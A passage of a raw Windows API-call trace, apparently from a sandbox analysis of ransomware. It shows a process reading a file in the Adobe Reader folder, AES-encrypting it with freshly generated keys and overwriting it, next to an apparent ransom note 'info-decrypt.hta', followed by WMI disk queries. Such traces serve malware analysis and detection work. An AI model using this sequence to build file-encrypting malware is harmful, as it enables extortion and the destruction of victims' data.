10.0\\IrakHau.htm", lpFilePart=0x0) returned 0x34 [0195.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0195.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecec) returned 1 [0195.405] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6ceed68 | out: lpFileInformation=0x6ceed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109b3760, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x109b3760, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x109b3760, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0195.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceece8) returned 1 [0195.406] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", nBufferLength=0x105, lpBuffer=0x6cee808, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", lpFilePart=0x0) returned 0x34 [0195.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecb4) returned 1 [0195.406] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), fInfoLevelId=0x0, lpFileInformation=0x3490ca8 | out: lpFileInformation=0x3490ca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4288)) returned 1 [0195.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceecb0) returned 1 [0195.793] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", nBufferLength=0x105, lpBuffer=0x6cee6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", lpFilePart=0x0) returned 0x34 [0195.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebe8) returned 1 [0195.794] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348 [0195.794] GetFileType (hFile=0x348) returned 0x1 [0195.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebe4) returned 1 [0195.794] GetFileType (hFile=0x348) returned 0x1 [0195.794] GetFileSize (in: hFile=0x348, lpFileSizeHigh=0x6ceecf0 | out: lpFileSizeHigh=0x6ceecf0*=0x0) returned 0x4288 [0195.794] ReadFile (in: hFile=0x348, lpBuffer=0x35ce6ec, nNumberOfBytesToRead=0x4288, lpNumberOfBytesRead=0x6ceec9c, lpOverlapped=0x0 | out: lpBuffer=0x35ce6ec*, lpNumberOfBytesRead=0x6ceec9c*=0x4288, lpOverlapped=0x0) returned 1 [0195.796] CloseHandle (hObject=0x348) returned 1 [0195.796] CryptAcquireContextW (in: phProv=0x6ceec3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ceec3c*=0x7a9178) returned 1 [0195.797] CryptGenRandom (in: hProv=0x7a9178, dwLen=0x10, pbBuffer=0x35d2cc8 | out: pbBuffer=0x35d2cc8) returned 1 [0197.889] CryptImportKey (in: hProv=0x7a9178, pbData=0x35c1180, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6ceec0c | out: phKey=0x6ceec0c*=0x77b130) returned 1 [0197.889] CryptContextAddRef (hProv=0x7a9178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0197.890] CryptContextAddRef (hProv=0x7a9178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0197.890] CryptDuplicateKey (in: hKey=0x77b130, pdwReserved=0x0, dwFlags=0x0, phKey=0x6ceebfc | out: phKey=0x6ceebfc*=0x77b2b0) returned 1 [0197.890] CryptContextAddRef (hProv=0x7a9178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0197.890] CryptSetKeyParam (hKey=0x77b2b0, dwParam=0x4, pbData=0x35c1260*=0x1, dwFlags=0x0) returned 1 [0197.890] CryptSetKeyParam (hKey=0x77b2b0, dwParam=0x1, pbData=0x35c122c, dwFlags=0x0) returned 1 [0197.890] CryptEncrypt (in: hKey=0x77b2b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x35c1270*, pdwDataLen=0x6ceec68*=0x4290, dwBufLen=0x4290 | out: pbData=0x35c1270*, pdwDataLen=0x6ceec68*=0x4290) returned 1 [0197.890] CryptEncrypt (in: hKey=0x77b2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35c5524*, pdwDataLen=0x6ceec70*=0x0, dwBufLen=0x10 | out: pbData=0x35c5524*, pdwDataLen=0x6ceec70*=0x10) returned 1 [0197.892] CryptDestroyKey (hKey=0x77b130) returned 1 [0197.892] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0197.892] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0197.892] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", nBufferLength=0x105, lpBuffer=0x6cee6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", lpFilePart=0x0) returned 0x34 [0197.892] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebd4) returned 1 [0197.892] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x59c [0197.892] GetFileType (hFile=0x59c) returned 0x1 [0197.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebd0) returned 1 [0197.892] GetFileType (hFile=0x59c) returned 0x1 [0197.892] WriteFile (in: hFile=0x59c, lpBuffer=0x35d8cd8*, nNumberOfBytesToWrite=0x44a0, lpNumberOfBytesWritten=0x6ceec90, lpOverlapped=0x0 | out: lpBuffer=0x35d8cd8*, lpNumberOfBytesWritten=0x6ceec90*=0x44a0, lpOverlapped=0x0) returned 1 [0197.893] CloseHandle (hObject=0x59c) returned 1 [0197.894] CoTaskMemAlloc (cb=0x20c) returned 0x9825530 [0197.894] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9825530 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0197.895] CoTaskMemFree (pv=0x9825530) [0197.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6cee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0197.895] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceec10 | out: ppv=0x6ceec10*=0x72015c) returned 0x0 [0197.895] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceec08 | out: pAptType=0x6ceec08*=1) returned 0x0 [0197.895] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceec0c | out: ppvObject=0x6ceec0c*=0x0) returned 0x80004002 [0197.895] IUnknown:Release (This=0x72015c) returned 0x1 [0197.896] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee578 | out: ppv=0x6cee578*=0x6736df8) returned 0x0 [0197.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736df8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee790 | out: ppvObject=0x6cee790*=0x0) returned 0x80004002 [0197.896] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736df8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee7a4 | out: ppvObject=0x6cee7a4*=0x6738c40) returned 0x0 [0197.896] WbemDefPath:IUnknown:Release (This=0x6736df8) returned 0x0 [0197.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3c4 | out: ppvObject=0x6cee3c4*=0x6738c40) returned 0x0 [0197.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee380 | out: ppvObject=0x6cee380*=0x0) returned 0x80004002 [0197.896] WbemDefPath:IUnknown:AddRef (This=0x6738c40) returned 0x3 [0197.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedcdc | out: ppvObject=0x6cedcdc*=0x0) returned 0x80004002 [0197.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedc8c | out: ppvObject=0x6cedc8c*=0x0) returned 0x80004002 [0197.896] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedc98 | out: ppvObject=0x6cedc98*=0x9820d98) returned 0x0 [0197.896] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820d98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedca0 | out: pCid=0x6cedca0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.897] WbemDefPath:IUnknown:Release (This=0x9820d98) returned 0x3 [0197.897] CoGetContextToken (in: pToken=0x6cedcf8 | out: pToken=0x6cedcf8) returned 0x0 [0197.897] CoGetContextToken (in: pToken=0x6cee100 | out: pToken=0x6cee100) returned 0x0 [0197.897] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee190 | out: ppvObject=0x6cee190*=0x0) returned 0x80004002 [0197.897] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x2 [0197.897] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x1 [0197.897] CoGetContextToken (in: pToken=0x6ceea88 | out: pToken=0x6ceea88) returned 0x0 [0197.897] CoGetContextToken (in: pToken=0x6cee9e8 | out: pToken=0x6cee9e8) returned 0x0 [0197.897] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x6ceeab8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceeab4 | out: ppvObject=0x6ceeab4*=0x6738c40) returned 0x0 [0197.897] WbemDefPath:IUnknown:AddRef (This=0x6738c40) returned 0x3 [0197.897] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x2 [0197.897] WbemDefPath:IWbemPath:SetText (This=0x6738c40, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.897] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0197.897] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec38*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec38*=0x20, pszText=0x0) returned 0x0 [0197.897] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.897] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738c40, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0197.897] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0197.897] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738c40, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0197.897] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738c40, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0197.897] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6ceebbc | out: puCount=0x6ceebbc*=0x0) returned 0x0 [0197.897] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6ceeba8 | out: puCount=0x6ceeba8*=0x2) returned 0x0 [0197.897] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeba4*=0xf, pszText=0x0) returned 0x0 [0197.897] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceeba4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeba4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.897] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb58 | out: ppv=0x6ceeb58*=0x72015c) returned 0x0 [0197.897] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb50 | out: pAptType=0x6ceeb50*=1) returned 0x0 [0197.897] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb54 | out: ppvObject=0x6ceeb54*=0x0) returned 0x80004002 [0197.897] IUnknown:Release (This=0x72015c) returned 0x1 [0197.898] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee4c0 | out: ppv=0x6cee4c0*=0x6737038) returned 0x0 [0197.898] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737038, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee6d8 | out: ppvObject=0x6cee6d8*=0x0) returned 0x80004002 [0197.898] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737038, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee6ec | out: ppvObject=0x6cee6ec*=0x6738770) returned 0x0 [0197.899] WbemDefPath:IUnknown:Release (This=0x6737038) returned 0x0 [0197.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee30c | out: ppvObject=0x6cee30c*=0x6738770) returned 0x0 [0197.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee2c8 | out: ppvObject=0x6cee2c8*=0x0) returned 0x80004002 [0197.899] WbemDefPath:IUnknown:AddRef (This=0x6738770) returned 0x3 [0197.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedc24 | out: ppvObject=0x6cedc24*=0x0) returned 0x80004002 [0197.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedbd4 | out: ppvObject=0x6cedbd4*=0x0) returned 0x80004002 [0197.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedbe0 | out: ppvObject=0x6cedbe0*=0x9821038) returned 0x0 [0197.899] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9821038, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedbe8 | out: pCid=0x6cedbe8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.899] WbemDefPath:IUnknown:Release (This=0x9821038) returned 0x3 [0197.899] CoGetContextToken (in: pToken=0x6cedc40 | out: pToken=0x6cedc40) returned 0x0 [0197.899] CoGetContextToken (in: pToken=0x6cee048 | out: pToken=0x6cee048) returned 0x0 [0197.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee0d8 | out: ppvObject=0x6cee0d8*=0x0) returned 0x80004002 [0197.899] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x2 [0197.899] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x1 [0197.899] CoGetContextToken (in: pToken=0x6cee9d0 | out: pToken=0x6cee9d0) returned 0x0 [0197.899] CoGetContextToken (in: pToken=0x6cee930 | out: pToken=0x6cee930) returned 0x0 [0197.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x6ceea00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6cee9fc | out: ppvObject=0x6cee9fc*=0x6738770) returned 0x0 [0197.899] WbemDefPath:IUnknown:AddRef (This=0x6738770) returned 0x3 [0197.899] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x2 [0197.899] WbemDefPath:IWbemPath:SetText (This=0x6738770, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0197.900] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x6ceeb80 | out: puCount=0x6ceeb80*=0x2) returned 0x0 [0197.900] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6ceeb7c*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb7c*=0xf, pszText=0x0) returned 0x0 [0197.900] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6ceeb7c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb7c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.900] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceeb80 | out: ppv=0x6ceeb80*=0x72015c) returned 0x0 [0197.900] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeb78 | out: pAptType=0x6ceeb78*=1) returned 0x0 [0197.900] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceeb7c | out: ppvObject=0x6ceeb7c*=0x0) returned 0x80004002 [0197.900] IUnknown:Release (This=0x72015c) returned 0x1 [0197.900] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee7a0 | out: ppv=0x6cee7a0*=0x672f160) returned 0x0 [0197.901] WbemLocator:IUnknown:QueryInterface (in: This=0x672f160, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee9b8 | out: ppvObject=0x6cee9b8*=0x0) returned 0x80004002 [0197.901] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f160, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee9cc | out: ppvObject=0x6cee9cc*=0x6737068) returned 0x0 [0197.901] WbemLocator:IUnknown:Release (This=0x672f160) returned 0x0 [0197.901] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee5ec | out: ppvObject=0x6cee5ec*=0x6737068) returned 0x0 [0197.901] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee5a8 | out: ppvObject=0x6cee5a8*=0x0) returned 0x80004002 [0197.901] WbemLocator:IUnknown:AddRef (This=0x6737068) returned 0x3 [0197.901] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedf04 | out: ppvObject=0x6cedf04*=0x0) returned 0x80004002 [0197.901] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedeb4 | out: ppvObject=0x6cedeb4*=0x0) returned 0x80004002 [0197.901] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedec0 | out: ppvObject=0x6cedec0*=0x0) returned 0x80004002 [0197.901] CoGetContextToken (in: pToken=0x6cedf20 | out: pToken=0x6cedf20) returned 0x0 [0197.901] CoGetContextToken (in: pToken=0x6cee328 | out: pToken=0x6cee328) returned 0x0 [0197.901] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3b8 | out: ppvObject=0x6cee3b8*=0x0) returned 0x80004002 [0197.901] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x2 [0197.901] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x1 [0197.901] CoGetContextToken (in: pToken=0x6cee998 | out: pToken=0x6cee998) returned 0x0 